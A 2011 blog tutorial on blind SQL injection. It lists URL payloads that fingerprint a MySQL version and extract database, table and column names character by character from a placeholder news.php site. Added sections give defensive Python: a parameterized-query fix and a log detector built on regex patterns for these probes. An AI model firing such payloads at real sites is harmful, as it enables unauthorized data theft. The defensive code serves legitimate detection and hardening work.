Monday, January 10, 2011

Blind SQL Injection

This type of SQL injection is harder, because the technique is based on true or false statements rather than on error messages. It should be used only if the error-based technique doesn't work. First of all you need to find a vulnerability on the victim's website. To do this you add "+AND+1=1" on the end:
www.victim.com/news.php?id=6+AND+1=1

The victim's page should be unchanged. Now add "+AND+1=2" on the end:
www.victim.com/news.php?id=6+AND+1=2

If you now see an error (or a different page) in the browser, you are on the right track: the website is vulnerable.
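The "1=1 versus 1=2" check works only when the parameter is pasted straight into the SQL text. The following added example (not from the original post) reproduces that behaviour against a constructed in-memory SQLite table that stands in for the news table behind news.php: a string-concatenated query answers the two probes differently, while a parameterized one treats the whole value as data and returns the same (empty) result for both. The table, column names and helper functions are assumptions made for the example.

```python
import sqlite3


def make_db():
    # Constructed stand-in for the news table behind news.php (not real data).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO news VALUES (?, ?)",
        [(5, "Old post"), (6, "Latest post"), (7, "Draft")],
    )
    return conn


def fetch_news_vulnerable(conn, raw_id):
    """Builds the query by string concatenation, as a vulnerable news.php would.

    The untrusted value becomes part of the SQL text, so a trailing
    'AND 1=1' / 'AND 1=2' changes which rows come back: a one-bit oracle.
    """
    sql = "SELECT title FROM news WHERE id=" + raw_id
    return [row[0] for row in conn.execute(sql)]


def fetch_news_safe(conn, raw_id):
    """Hardened version: validate the type, then bind the value as a parameter.

    The bound value is never parsed as SQL, so 'AND 1=1' and 'AND 1=2' can no
    longer produce different pages. The digit check additionally lets the
    application reject junk before the database is asked at all.
    """
    if not raw_id.isdigit():
        return []
    sql = "SELECT title FROM news WHERE id=?"
    return [row[0] for row in conn.execute(sql, (int(raw_id),))]


def boolean_probe_distinguishable(fetch):
    """True if the true/false probe pair yields different results, i.e. the
    endpoint leaks the kind of oracle the post relies on."""
    conn = make_db()
    page_true = fetch(conn, "6 AND 1=1")
    page_false = fetch(conn, "6 AND 1=2")
    return page_true != page_false


if __name__ == "__main__":
    print("vulnerable oracle:", boolean_probe_distinguishable(fetch_news_vulnerable))
    print("parameterized oracle:", boolean_probe_distinguishable(fetch_news_safe))
```

The fix that matters is the parameter binding; the `isdigit` check only gives the application a clean way to refuse the request instead of silently returning nothing.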


Now it's time to find out the version of the database. For this we use the substring function. For example:
www.victim.com/news.php?id=6+and+substring(@@version,1,1)=4

If you see an error in the browser, the database isn't version 4 (e.g. 4.2.2). Now we need to check whether it is version 5 (e.g. 5.0.51b-log):
www.victim.com/news.php?id=6+and+substring(@@version,1,1)=5

You'll probably get the normal page without errors. This means the database version is 5. Now it's time to test a subselect:
www.victim.com/news.php?id=6+and+(select+1)=1

If no error occurs, the subselect works. The next step is to find the name of the database. First you need to find how many characters the database name contains. For this I use the length function. For example:

1 question: Is it lower than 10?
www.victim.com/news.php?id=6+and+length(database())<10
1 answer: No error = YES

2 question: Is it lower than 6?
www.victim.com/news.php?id=6+and+length(database())<6
2 answer: Error = NO

3 question: Is it equal to 6?
www.victim.com/news.php?id=6+and+length(database())=6
3 answer: No error = YES

Now we know that the database name contains 6 characters. It's time to show you how to find them. The principle is the same as for finding how many characters the name contains.

1 question: Is it lower than 97?
www.victim.com/news.php?id=6+and+ascii(substring(database(),1,1))<97
1 answer: Error = NO

2 question: Is it lower than 122?
www.victim.com/news.php?id=6+and+ascii(substring(database(),1,1))<122
2 answer: No error = YES

This means that the first character of the database name is between 97 and 122 in the ASCII table (see a full ASCII table for all symbols, characters and numbers).

3 question: Is it equal to 118?
www.victim.com/news.php?id=6+and+ascii(substring(database(),1,1))=118
3 answer: No error = YES

We found the first character of six. It's 118. If you look at http://ascii-ascii.blogspot.com you'll see that 118 is the lowercase letter "v". Now we need to find the second letter.

1 question: Is it lower than 108?
www.victim.com/news.php?id=6+and+ascii(substring(database(),2,1))<108
1 answer: No error = YES

2 question: Is it equal to 105?
www.victim.com/news.php?id=6+and+ascii(substring(database(),2,1))=105
2 answer: No error = YES

We found the second character of six. It's 105. If you look at http://ascii-ascii.blogspot.com you'll see that 105 is the lowercase letter "i".

We do the same thing for the third character.
1 question: Is it lower than 102?
www.victim.com/news.php?id=6+and+ascii(substring(database(),3,1))<102
1 answer: No error = YES

2 question: Is it equal to 99?
www.victim.com/news.php?id=6+and+ascii(substring(database(),3,1))=99
2 answer: No error = YES

And we found the third character of six. It's 99. If you look at http://ascii-ascii.blogspot.com you'll see that 99 is the lowercase letter "c".


We have 3 letters, "vic...". I assumed the database name is "victim". In the same way you can find tables, columns, even data. Queries for obtaining this information can be found at http://web-injection.blogspot.com/2010/10/error-based-sql-injections.html. You can also use tools like "BlindCat".


Sometimes you can try to find tables or columns by guessing. For example, assuming there is a table "Users":
www.victim.com/news.php?id=6+and+(select+1+from+Users+limit+0,1)=1
Error = Not exist
No Error= Exist

For the column "username" in the table "Users" the query would look like this:
www.victim.com/news.php?id=6+and+(select+substring(concat(1,username),1,1)+from+Users+limit+0,1)=1
Error = Not exist
No Error= Exist

Be creative ...
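Seen from the other side, every one of the requests above lands in the web server's access log, and a boolean-based extraction is unusually noisy: one client, one path, dozens of near-identical query strings whose responses alternate between two page sizes. The following added example (not from the original post) parses constructed combined-format log lines, decodes the query string, and flags the probe fragments this post uses (`AND 1=1`, `substring(`, `length(`, `ascii(`, `@@version`, `database()`, `(select`). The log lines, IP addresses and sizes are constructed; the regular expressions and threshold are assumptions for the example.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

# Constructed combined-format access-log sample (not real traffic).
# 203.0.113.7 walks through the probes from the post; 198.51.100.4 is a normal visitor.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2011:10:01:01 +0000] "GET /news.php?id=6 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Jan/2011:10:01:02 +0000] "GET /news.php?id=6+AND+1=1 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Jan/2011:10:01:03 +0000] "GET /news.php?id=6+AND+1=2 HTTP/1.1" 200 412
203.0.113.7 - - [10/Jan/2011:10:01:05 +0000] "GET /news.php?id=6+and+substring(@@version,1,1)=5 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Jan/2011:10:01:06 +0000] "GET /news.php?id=6+and+length(database())<10 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Jan/2011:10:01:07 +0000] "GET /news.php?id=6+and+ascii(substring(database(),1,1))<97 HTTP/1.1" 200 412
203.0.113.7 - - [10/Jan/2011:10:01:08 +0000] "GET /news.php?id=6+and+ascii(substring(database(),1,1))%3C122 HTTP/1.1" 200 5120
198.51.100.4 - - [10/Jan/2011:10:02:00 +0000] "GET /news.php?id=7 HTTP/1.1" 200 4980
198.51.100.4 - - [10/Jan/2011:10:02:30 +0000] "GET /search.php?q=substring+of+text HTTP/1.1" 200 3000
"""

# Minimal parser for the combined log format: client IP, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+)'
)

# Fragments that appear in the boolean probes described in the post. They are
# matched against the URL-decoded query string, so '+' and '%3C' are normalised first.
PROBE_PATTERNS = [
    re.compile(r"\band\s+\d+\s*=\s*\d+", re.I),              # AND 1=1 / AND 1=2
    re.compile(r"\b(?:substring|length|ascii)\s*\(", re.I),  # character-by-character helpers
    re.compile(r"@@version|\bdatabase\s*\(\s*\)", re.I),     # fingerprinting targets
    re.compile(r"\(\s*select\b", re.I),                      # subselect test
]


def parse_line(line):
    """Return a dict with ip, path, decoded query, status and size, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("path").partition("?")
    return {
        "ip": m.group("ip"),
        "path": path,
        "query": unquote_plus(query),  # '+' -> space, '%3C' -> '<'
        "status": int(m.group("status")),
        "size": int(m.group("size")),
    }


def is_probe(query):
    """True if the decoded query string contains any of the probe fragments."""
    return any(p.search(query) for p in PROBE_PATTERNS)


def analyze(log_text, threshold=3):
    """Count probe requests per client IP and report those at or above threshold.

    The distinct response sizes are reported too: a working boolean oracle shows
    up as the same path flipping between two page lengths (here 5120 and 412).
    """
    probes = Counter()
    sizes = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not is_probe(rec["query"]):
            continue
        probes[rec["ip"]] += 1
        sizes[rec["ip"]].add(rec["size"])
    return {
        ip: {"probes": n, "response_sizes": sorted(sizes[ip])}
        for ip, n in probes.items()
        if n >= threshold
    }


if __name__ == "__main__":
    for ip, info in analyze(SAMPLE_LOG).items():
        print(f"{ip}: {info['probes']} probe requests, response sizes {info['response_sizes']}")
```

The search request containing the word "substring" is deliberately included to show that the patterns key on the function-call form (`substring(`), not on the bare word, which keeps ordinary text queries out of the alert. In practice the per-IP threshold and the two-size signature are what separate a real extraction run from a single curious visitor.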